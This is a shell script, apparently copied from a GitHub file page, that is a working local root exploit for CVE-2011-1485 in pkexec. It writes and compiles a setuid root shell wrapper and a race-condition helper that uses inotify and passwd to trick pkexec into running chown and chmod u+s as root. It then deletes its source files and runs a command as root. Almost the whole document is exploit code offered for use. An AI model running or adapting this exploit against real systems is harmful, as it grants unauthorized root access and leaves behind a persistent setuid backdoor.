/
CVE-2011-1485.sh
executable file
·48 lines (46 loc) · 1.02 KB
/
CVE-2011-1485.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# modified from http://downloads.securityfocus.com/vulnerabilities/exploits/47496.sh
# for rdot.org
cat > suid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
if(argc == 2) {
setgid(0); setuid(0);
system(argv[1]); }
return 0;
}
_EOF
cat > makesuid.c << _EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
int main(int argc, char **argv)
{
if (fork() != 0)
{
int fd;
char pid_path[15];
sprintf(pid_path, "/proc/%i", getpid());
close(0); close(1); close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/passwd", "/usr/bin/passwd", NULL);
}
else
{
execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL);
}
return 0;
}
_EOF
gcc -o suid suid.c
gcc -o makesuid makesuid.c
./makesuid chown root:root $PWD/suid
./makesuid chmod u+s $PWD/suid
echo "your suid is on ./suid make sure u move this !!!"
rm suid.c makesuid.c makesuid
$PWD/suid -c /usr/bin/id